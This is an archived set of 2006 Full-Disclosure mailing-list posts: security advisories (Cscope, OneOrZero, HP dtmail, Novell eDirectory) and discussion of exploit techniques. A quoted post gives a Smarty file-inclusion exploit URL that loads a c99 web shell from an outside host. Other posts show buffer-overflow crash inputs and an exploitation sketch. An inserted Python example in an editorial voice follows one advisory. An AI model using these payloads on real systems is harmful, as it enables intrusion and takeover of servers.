[Full-disclosure] [ GLSA 200610-08 ] Cscope: Multiple buffer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200610-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Cscope: Multiple buffer overflows
      Date: October 20, 2006
      Bugs: #144869
        ID: 200610-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Cscope is vulnerable to multiple buffer overflows that could lead to the
execution of arbitrary code.

Background
==========

Cscope is a developer's tool for browsing source code.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  dev-util/cscope     < 15.5.20060927                >= 15.5.20060927

Description
===========

Unchecked use of strcpy() and *scanf() leads to several buffer
overflows.

Impact
======

A user could be enticed to open a carefully crafted file which would
allow the attacker to execute arbitrary code with the permissions of the
user running Cscope.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Cscope users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-util/cscope-15.5.20060927"

References
==========

  [ 1 ] CVE-2006-4262
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4262

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] trouble in milwaukee?
Edward F. Klimowicz said:
> Trying to access from Philadelphia to Milwaukee, I get erratic network
> drops going through Time Warner Telecom. Anyone aware of any issue?
> This apparently started around 7:30p EDT.

Yeah, some skript kiddies with an IOS exploit were causing BGP flaps.

Not really - but if there were, that would be almost the only way it
could be on-topic for full-disclosure. I don't suppose you have anything
more specific to go on, like an actual traceroute or something? Or other
data that explains why you think it's Time Warner rather than their
up/downstream?

Disagreements, flames, arguments, and off-topic discussion should be
taken off-list wherever possible. Thank you.
Re: [Full-disclosure] Vuln
On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat [EMAIL PROTECTED] wrote:
> I didn't know those were mutually exclusive. That's like asking your
> mom if she is a slut or a whore. Aren't they one and the same?
>
> On 10/15/06, upb [EMAIL PROTECTED] wrote:
>> are you fucking stupid or just retarded?
>>
>> On 10/14/06, hitham hitham [EMAIL PROTECTED] wrote:
>>> Hi
>>> I find a new vuln ... the vuln :-
>>>
>>> # Author  :- Sp1deR_NeT
>>> # E-mail  :- [EMAIL PROTECTED]
>>> # Sites   :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com
>>> # We Are  :- Sp1deR_NeT , HACKERS PAL , MohajaLi .
>>> # Script  :- Smarty-2.6.9
>>>
>>> Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>>>
>>> Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt?
>>>
>>> Vuln Code :-
>>>
>>>     /**
>>>      * wrapper for include() retaining $this
>>>      * @return mixed
>>>      */
>>>     function _include($filename, $once=false, $params=null)
>>>     {
>>>         if ($once) {
>>>             return include_once($filename);
>>>         } else {
>>>             return include($filename);
>>>         }
>>>     }
>>>
>>> - Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.
>>> - WwW.Sp1deR-N3T.Com ///\\\///\\\
>>> [EMAIL PROTECTED] [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]

Disagreements, flames, arguments, and off-topic discussion should be
taken off-list wherever possible.
Re: [Full-disclosure] trouble in milwaukee?
[EMAIL PROTECTED] wrote:
> Disagreements, flames, arguments, and off-topic discussion should be
> taken off-list wherever possible.

You forgot to apply that rule iteratively again, didn't you...

Regards,

Nick FitzGerald
[Full-disclosure] Web-style Wireless IDS attacks
Web-style Wireless IDS attacks
By Sergey Gordeichik, Positive Technologies Security Expert

Introduction

Wireless intrusion detection systems (WIDS) are not yet as popular as
their wired counterparts, but current trends would suggest that their
number is set to grow. One positive factor in this respect is the
integration of such programs with active network equipment and
management awareness of the risks associated with the unauthorised use
of wireless devices. This awareness has led to an increase in the number
of WIDS installations - even where wireless networks are not used.

In view of this situation, specialists in the field of security are now
aware of the need to evaluate not only the quality features of any
product, but also of the need to predict any possible negative influence
arising from its implementation on the security of a corporate network.

This article looks at the results of research into wireless intrusion
detection systems from the point of view of the specialist in the field
of applications security. Design faults discovered are not discussed in
the article as their correction requires significant effort on the part
of the manufacturer.

Full article: http://maxpatrol.com/webwids.asp
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
On Fri, 20 Oct 2006 06:33:32 CDT, Gadi Evron said:
> Gil kept working on tiny PE, and many others started pitching in ideas.

Bah. Pikers. This guy got a Linux executable down to smaller than the
ELF header. 45 bytes.

http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
Re: [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard
Sorry, sorry. The package was from Sourceforge and the md5 is correct.

There is an intrusion into our systems. Most probably, the intruder
exploited public key login from another host. The devil-linux.org site
was inaccessible because of a problem in our http proxy which cached a
0-size page for several days. Coincidence of coincidences, my excuses.
There are no problems with the DevilLinux distro.

Victor Grishchenko

On 19.10.2006, at 22:44, Noam Rathaus wrote:
> Hi,
>
> I looked into devil-linux-1.2.10-i486.tar.bz2 from SourceForge, but
> didn't see what you mentioned... where did you get the package from?
[Full-disclosure] tiny PE now at... 304 bytes. Is this the end?
Gil kept working on tiny PE, and many others started pitching in ideas.

Apparently, one of the latest ideas Gil was playing with (as mentioned
in his first post) was the Optional Header Size. Apparently, as two
reversers in anti-virus companies let him know, a virus played with
this too, which got tiny PE down to 330 bytes.

After more games, as he described below, it's now at 304 bytes and I
wonder who will shave those 4 bytes off?

Tiny PE v.3 can be found here: http://ragestorm.net/tiny/tiny3.exe
Blog on details here: http://blogs.securiteam.com/index.php/archives/690

Gadi.
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
--On Friday, October 20, 2006 08:53:36 -0400 [EMAIL PROTECTED] wrote:
> On Fri, 20 Oct 2006 06:33:32 CDT, Gadi Evron said:
>> Gil kept working on tiny PE, and many others started pitching in
>> ideas.
>
> Bah. Pikers. This guy got a Linux executable down to smaller than the
> ELF header. 45 bytes.
>
> http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

Yeahbut, that's equivalent to 450 bytes on Windows, isn't it? :-)

Paul Schmehl ([EMAIL PROTECTED])
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/
[Full-disclosure] Fire and forget exploits?
Hi,

I'm looking for examples of (remote) security vulnerabilities whose
exploitation involves no guesswork--eg, no bruteforcing the return
address, or altering your exploit based on the server's response, etc.

It seems like this kind of exploit is dying out, particularly as
different flavors of Linux proliferate, each with their own slightly
different libc and userland; in the Windows world, however, we still
find universal exploits that work on NT4/2k/XP over a variety of
service packs.

Anyways, if anyone has come across things like this, I'd greatly
appreciate hearing about it. I'm working on some new methods to deliver
exploits at once while minimizing recon.

Thanks,
Brendan Dolan-Gavitt
Re: [Full-disclosure] Fire and forget exploits?
Hi,

Brendan Dolan-Gavitt wrote:
> Hi,
>
> I'm looking for examples of (remote) security vulnerabilities whose
> exploitation involves no guesswork--eg, no bruteforcing the return
> address, or altering your exploit based on the server's response, etc.

I guess you're thinking about _remote_ exploitation? You don't have to
guess anything for a local bo for instance.. Anyway:

> It seems like this kind of exploit is dying out, particularly as
> different flavors of Linux proliferate, each with their own slightly

Target the kernel? Use linux-gate.so? Portability of your exploit will
greatly depend on how you choose to exploit the vulnerability, since
it's quite common to have to choose btw several exploitation
scenarii..

> different libc and userland; in the Windows world, however, we still
> find universal exploits that work on NT4/2k/XP over a variety of
> service packs.

The language also affects some pointers. Anyway, if you need, let's say,
a "jmp esp", you can try to choose one location in memory that contains
this opcode for several SP/languages. But I don't think you can prove
any exploit will be universal... (can you? ;)

> Anyways, if anyone has come across things like this, I'd greatly
> appreciate hearing about it. I'm working on some new methods to
> deliver exploits at once while minimizing recon.
>
> Thanks,
> Brendan Dolan-Gavitt

Cheers,

endrazine-
Re: [Full-disclosure] Fire and forget exploits?
On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote:
> It seems like this kind of exploit is dying out, particularly as
> different flavors of Linux proliferate, each with their own slightly
> different libc and userland; in the Windows world, however, we still
> find universal exploits that work on NT4/2k/XP over a variety of
> service packs.

Doesn't this implicitly support Dan Geer et al's argument about
software monoculture?

In fact, wouldn't the "linux monoculture" concept constitute a bit of a
misnomer? Each slightly different userland and libc would constitute a
different flavor, right?

Nevertheless, the received wisdom remains that "If linux took over from
Windows tomorrow, all the hackers would concentrate on linux flaws, and
we'd be in the same position."

--
Bruce Ediger 720-932-1954 [EMAIL PROTECTED]
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
>> Bah. Pikers. This guy got a Linux executable down to smaller than the
>> ELF header. 45 bytes.
>>
>> http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
>
> Yeahbut, that's equivalent to 450 bytes on Windows, isn't it? :-)

No, it's equivalent to 144 bytes for NT and later, and 132 bytes for XP
and later.
[Full-disclosure] Advisory for Oneorzero helpdesk
Permanent Link: http://www.whitedust.net/speaks/3043/

- Advisory for OneOrZero Helpdesk -
- OneOrZero Helpdesk -

AFFECTED PRODUCTS
=================
OneOrZero Helpdesk v1.6.0 - v1.6.4

OVERVIEW
========
From the website: "The OneOrZero Open Source Task Management and Help
Desk System is a powerful task management and help desk application,
based to 'get the job done'."
http://www.oneorzero.com/

An insecure password reset allows external knowledge of what the
password is set to.

DETAILS
=======
1. Information Disclosure

The forgot-password function will reset the password after a security
question is answered. However, the admin user has this password left
blank by default and it is often left that way after the program is
installed. By attempting to reset the admin password and leaving the
answer blank, one can force a reset of the password.

However, since the password reset function sets the password based only
on the username and the time on the server, the password that it is set
to can be determined easily. Once the time of a server is discovered,
determining what the password is set to becomes trivial.

POC
===
1. The password is generated with the following code:

    $password = time().$_POST[username];

Quite often web servers will return the date on the server for when the
request is processed. For example:

    Date: Thu, 12 Oct 2006 01:11:21 GMT

The following command on a Linux system will return the Unix time for
when the request was processed:

    bash$ date --date="Thu, 12 Oct 2006 01:11:21 GMT" +%s
    1160615001

Which allows us to deduce the resulting password of 1160615001admin.

SOLUTION
========
vendor contact: [EMAIL PROTECTED]
Sept. 28  Vendor notification. [EMAIL PROTECTED]
Sept. 29  Vendor reply [EMAIL PROTECTED]
Oct. 10   oneorzero v1.6.5.4 released to address this issue.

Credits
=======
This vulnerability was discovered and researched by Michael Klingler
whitehatguru at gmail.com
SecurityMetrics, Inc.
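The advisory's point is that a reset password derived only from time() and the username has a search space of a few seconds, and the server advertises its clock in every response's Date header. The following is an added example (not code from the advisory, from SecurityMetrics or from the OneOrZero project): it mirrors the weak generator, shows how small the candidate set is around a given Date header, provides an audit check that flags time-derived reset passwords, and shows the CSPRNG-based generator a fixed version should use instead. The function names and the sample Date header are my own constructions.

```python
"""Weak vs. hardened password-reset generation, after the OneOrZero
advisory. Added example; the vulnerable line it mirrors is the advisory's
`$password = time().$_POST[username];`.
"""
import secrets
from email.utils import parsedate_to_datetime


def http_date_to_epoch(date_header):
    """Convert an RFC 1123 HTTP Date header value to a Unix timestamp.

    Equivalent to the advisory's `date --date="..." +%s` step.
    """
    return int(parsedate_to_datetime(date_header).timestamp())


def weak_reset_password(epoch, username):
    """Mirror of the vulnerable generator: time() concatenated with the
    username. The only 'secret' input is the server clock, which the
    server itself reveals in its Date header.
    """
    return "%d%s" % (epoch, username)


def weak_candidates(date_header, username, slack_seconds=5):
    """Every password the weak generator could have produced within
    +/- slack_seconds of the observed Date header. The size of this list
    (2*slack+1) is the entire search space an outsider faces.
    """
    t = http_date_to_epoch(date_header)
    return [weak_reset_password(s, username)
            for s in range(t - slack_seconds, t + slack_seconds + 1)]


def looks_time_derived(password, username, date_header, slack_seconds=5):
    """Audit check for a freshly issued reset password: does it match the
    time().username pattern around the server's Date header? True means
    the application is using the broken scheme.
    """
    return password in weak_candidates(date_header, username, slack_seconds)


def secure_reset_token(nbytes=24):
    """Hardened replacement: a token from the OS CSPRNG, independent of the
    clock, the username and anything else observable from outside.
    nbytes=24 yields a 32-character URL-safe string (192 bits of entropy).
    """
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    # Constructed sample header, not taken from any real server.
    hdr = "Thu, 01 Jan 2009 00:00:00 GMT"
    weak = weak_reset_password(http_date_to_epoch(hdr), "admin")
    print("weak password        :", weak)
    print("candidates (+/-5 s)  :", len(weak_candidates(hdr, "admin")))
    print("flagged as weak?     :", looks_time_derived(weak, "admin", hdr))
    strong = secure_reset_token()
    print("secure token         :", strong)
    print("flagged as weak?     :", looks_time_derived(strong, "admin", hdr))
```

The audit check is deliberately loose (a slack of a few seconds) because the Date header is only second-granular and the reset may be processed slightly after the response is timestamped; a token that is not time-derived will never fall into that window.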
Re: [Full-disclosure] Fire and forget exploits?
On Fri, Oct 20, 2006 at 10:09:13AM -0600, Bruce Ediger wrote:
> On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote:
>> It seems like this kind of exploit is dying out, particularly as
>> different flavors of Linux proliferate, each with their own slightly
>> different libc and userland; in the Windows world, however, we still
>> find universal exploits that work on NT4/2k/XP over a variety of
>> service packs.
>
> Doesn't this implicitly support Dan Geer et al's argument about
> software monoculture?
>
> In fact, wouldn't the "linux monoculture" concept constitute a bit of
> a misnomer? Each slightly different userland and libc would constitute
> a different flavor, right?
>
> Nevertheless, the received wisdom remains that "If linux took over
> from Windows tomorrow, all the hackers would concentrate on linux
> flaws, and we'd be in the same position."

You are also forgetting ASLR as it is getting deployed in most new
Linux systems. This reduces the monoculture aspect. (Windows is
catching up here too.)

Ciao, Marcus
[Full-disclosure] *ADVISORY UPDATE* [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
Netragard has updated this advisory with new information provided by
the vendor. This advisory has been updated.

*Netragard, L.L.C Advisory*
***************************
Strategic Reconnaissance Team
http://www.netragard.com -- "We make I.T. Safe."

[About Netragard]
-----------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools. This advisory is the
product of research done by the Strategic Reconnaissance Team.

[Official URL]
--------------
http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt

[Advisory Information]
----------------------
Contact          : Adriel T. Desautels
Advisory ID      : NETRAGARD-20060810
Product Name     : dtmail
Product Version  : see operating system
Vendor Name      : Hewlett Packard
Criticality      : Local Root Compromise
Effort           : Easy
Operating System : HP Tru64 UNIX 5.1B-3
                   HP Tru64 UNIX 5.1B-2/PK4
                   HP Tru64 UNIX 5.1A PK6
                   HP Tru64 UNIX 4.0G PK4
                   HP Tru64 UNIX 4.0F PK8
                   HP-UX B.11.23
                   HP-UX B.11.11
                   HP-UX B.11.00
Type             : Unchecked Buffer

[Product Description]
---------------------
The dtmail program is a desktop mail application. It provides an easy
to use interface for viewing, filing, composing and sending electronic
mail folders and mail messages. dtmail provides a GUI-based interface
for manipulating electronic mail messages that can have attachments.

Use the interface to compose a message, view a message or a folder
containing messages, load new mail, copy or move messages from one
folder to another, delete messages, reply to messages, add and delete
attachments to a message when composing, and view the contents of
attachments in a message. dtmail also supplies a mail-pervasive desktop
environment by providing a public Tooltalk API that other clients can
use to compose and send messages.

You can use dtmail as a Post Office Protocol (POP) client to connect to
mail servers offering POP services. If you choose this option, you can
also select APOP authentication (if supported by your mail server) to
encrypt your user ID and password during communications with your
network mail server.

[Technical Summary]
-------------------
dtmail suffers from a buffer overflow vulnerability which could result
in the execution of arbitrary code. More specifically this vulnerability
is triggered when using the -a flag:

  -a file1 ...fileN
      Bring up a Compose window with file1 through fileN as attachments.

[Technical Details]
-------------------
This was tested against Tru64 version 5.1b on a system with a working
display (a working display is required). The following gdb output
demonstrates the vulnerability.

(gdb) r -a -a `perl -e 'print "A" x 9000'`
Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable). In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
Roman Medina-Heigl Hernandez wrote:
> Product Name    : dtmail
> Product Version : 5.1b
> Vendor Name     : Hewlett Packard
> Criticality     : Local Root Compromise
> Effort          : Easy
> Operating System: Tru64
> Type            : Unchecked Buffer

Hello,

I've just installed the vulnerable package in my test-bed:

  # uname -a
  OSF1 alpha V5.1 2650 alpha
  # pwd
  /mnt/ALPHA/BASE
  # setld -l . OSFCDEMAIL540
  # ls -l /usr/dt/bin/dtmail
  -r-xr-sr-x   1 bin   mail   1212752 Oct 17  2002 /usr/dt/bin/dtmail
  #

How is this a local root? (binary is setgid mail but not setuid root)

Confirmed by HP: *NOT* a local root. "The vulnerability could be
exploited by a local, authorized user to execute arbitrary code as a
member of the 'mail' group."

http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c00793805&jumpid=reg_R1002_USEN

Interestingly enough, the bug is also present in HP-UX (same scope,
again not a local root). Netragard ppl should fix their advisory and
web site...

--
Saludos,
-Roman

PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Re: [Full-disclosure] Windows Command Processor CMD.EXE Buffer Overflow
Yeah! Buffer Overflow Windows XP SP2. I will debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
[EMAIL PROTECTED]
http://www.securitynation.com

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On behalf of The SNiFF
Sent: Friday, 20 October 2006 03:58 a.m.
To: [EMAIL PROTECTED]
Subject: Re: Windows Command Processor CMD.EXE Buffer Overflow

> Copy-paste the following line in cmd.exe and execute it.. (it is a
> single command, has been split into multiple lines for readability
> sake).
>
> %COMSPEC% /K dir \\?\ AA A A (260 characters of 'A's)

Tried it on Win2k3 SP1:

  C:\Documents and Settings\Administrator>%COMSPEC% /K dir \\?\AA AA

System replied: The filename or extension is too long.
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
PERFECT.MATERIAL wrote:
> Correction, TRU64 runs on Alphas in LSB mode. However, this bug is
> still not exploitable. Sorry for the NETRAGARD-like fuckup :D

I didn't have time enough to test this, but at first sight it seems
perfectly exploitable.

Alpha is a true 64-bit RISC processor (both data and addressing being
64 bits), little-endian. A typical stack address is something like:

  0x11ffff530  ( \x30\xf5\xff\x1f\x01\x00\x00\x00 )

So yes, you have nulls (3, in this case), but at the end of the
string :-)

You can try a typical string-alike buffer:

  [ NOPs ... SHELLCODE RET ]

(stack variables are just before RET, you have no saved frame pointer
stored here)

Assuming a typical RET value (like the former one), your exploit should
rely on memory being more or less clean, I mean, at least two nulls
(the third one is the \0 terminator byte, you can insert it) should
exist in the memory location where the attack string is being copied
(well, at the end of the string). Is this difficult? I don't think so
(but I don't really know for sure).

You can minimize the problem if you use longer RET addresses. For
instance, a typical address inside libc functions could be:

  0x3ff800f3810

(so you have two nulls, instead of three). You'd have to deal with only
one residual null value, instead of two. You can try this with a typical
return-into-libc exploit. This should be also sufficient (and useful) to
avoid non-executable stack protection, which is enabled by default in
Tru64.

Well, that's the theory... :-)

--
Saludos,
-Roman

PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Re: [Full-disclosure] Fire and forget exploits?
Brendan Dolan-Gavitt wrote:
> I'm looking for examples of (remote) security vulnerabilities whose
> exploitation involves no guesswork--eg, no bruteforcing the return
> address, or altering your exploit based on the server's response, etc.
>
> It seems like this kind of exploit is dying out, particularly as
> different flavors of Linux proliferate, each with their own slightly
> different libc and userland; in the Windows world, however, we still
> find universal exploits that work on NT4/2k/XP over a variety of
> service packs.

I don't think this is the main reason such exploits are less commonly
seen these days.

A great deal of hackish activity is now directly or indirectly focussed
on spamming, identity theft and related scams, and the money laundering
that necessarily trails along behind such activity. In general, all
these folk need to achieve their ends are stupid bugs in web
applications. The web is replete with crappily written, widely deployed
PHP schlock that more than fulfills these folks' needs. As they make
money from working this plentiful low-hanging fruit, there is little
motivation for many of them to spend the time and effort on the much
more elusive "grand exploits" of days gone by...

In fact, they generally want to stay _under_ the radar for as long as
possible -- their business model depends on it -- rather than making the
big splash on CNN, doing a Markoff interview/book/movie deal, etc,
etc...

Regards,

Nick FitzGerald
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
The advisory has been updated and fixed on the web page. Thank you for
catching the errors in the posting, we appreciate it.
Re: [Full-disclosure] [funsec] Who is n3td3v?
On Fri, 20 Oct 2006, Dr. Neal Krawetz wrote:
> On Fri Oct 20 15:49:53 2006, Gadi Evron wrote:
>> Cool article, but n3td3v is not gobbles. For one, easy analysis shows
>> he is English.
>>
>> Gadi.
>
> Thanks Gadi. However, I'm going to call you on this:
>
> 1. What easy analysis are you using? I listed my approaches. If you
>    are using a different approach, I'd like to hear what it is. (I'm
>    not trying to be argumentative -- I want to learn.)
>
> 2. You said, "n3td3v is not gobbles". Do you know for a fact that
>    n3td3v is not Gobbles Security? Or is this an interpretation? If
>    you know for a fact, then how do you know?
>
> On 1-Sep-2006, a new person controlling the n3td3v account appeared.
> He is likely English/Brit (based on the topics he posted). But I did
> not see enough text to analyze. The older n3td3v postings were by 3
> people, not one person. (And primarily by three people -- a few
> postings were ambiguous and could indicate more people.)

1. He speaks Real English.
2. He mentions UK currency.
3. He said as much, speaking of UK issues.
4. He gave his real name.

Your analysis is amazing, and shows how these things should be done. But
it misses that much.

Gobbles was about fun, n3td3v took himself seriously rather than just his
goal of making the world a better place.

Aside to that, yes, I know. But as I can't mention how, it's silly for
me to stick to anything but the above.

From the UK. Highly likely from the North of England or Scotland.

Did you ever talk to n3td3v or ask him? Behind all that posted, he
really seems like a good guy with good intentions.

Your analysis really is good, but it comes to no conclusions.

I want to avoid the "yes he is", "no he isn't" discussion that's to
follow. View my comments as opinion.

Why idolize people?

Gadi.

> -Neal
>
> Neal Krawetz, Ph.D.
> Hacker Factor Solutions
> http://www.hackerfactor.com/
> Author of "Introduction to Network Security" (Charles River Media, 2006)
> http://www.charlesriver.com/Books/BookDetail.aspx?productID=126130
[Full-disclosure] Hustle Labs MNIN eDirectory Vulnerability
As of 20-October-2006, Ryan Smith from Hustle Labs (http://www.hustlelabs.com) and Michael Ligh from MNIN (http://www.mnin.org) have released an advisory detailing a vulnerability in Novell eDirectory HTTPStk.

This vulnerability occurs when processing HTTP Request headers and can be triggered by a remote, anonymous attacker and will yield super-user access to the machine.

For more information please visit http://www.mnin.org/advisories/2006_novell_httpstk.pdf

Thanks,
Michael Ligh and Ryan Smith
Re: [Full-disclosure] trouble in milwaukee?
Title: Hushmail Express

[EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it, please visit the following web page:

https://www.hushmail.com/express/44BR8JRE

Frequently Asked Questions:

Why did I receive this email?
You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question created by the sender.

What is a secure email?
Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s).

Is it safe to follow the link in this email?
It is safe to visit the Hushmail web site by following the link provided in this email; however you should never open an email attachment unless you know the person who sent it to you, you were expecting to receive the file from them, and you have scanned the file for viruses.

When you arrive at the Hushmail web site, be sure to check the following:
- The address bar of your web browser shows: https://www.hushmail.com/express/
- A small picture of a padlock appears in the bottom right corner of your web browser

If you would prefer to access your message by entering its message code, please visit the following web page: https://www.hushmail.com/express. You will be asked to enter the following message code: 44BR 8JRE

What is Hushmail?
Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard algorithms. These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security. Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required.

How do I create a free Hushmail account?
You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/
Re: [Full-disclosure] [funsec] Who is n3td3v?
Title: Hushmail Express

[EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it, please visit the following web page:

https://www.hushmail.com/express/V52HR6JN

If you would prefer to access your message by entering its message code, please visit the following web page: https://www.hushmail.com/express. You will be asked to enter the following message code: V52H R6JN
Re: [Full-disclosure] [funsec] Who is n3td3v?
It's OK for anybody to start vulnerability research from scripts (PHP or Perl), but it's not good for someone to stay at script-kid level, huh?

-
mailto:[EMAIL PROTECTED]
http://www.wang-labs.com

2006/10/21, Gadi Evron [EMAIL PROTECTED]:

> [...]

--
Have a Good Day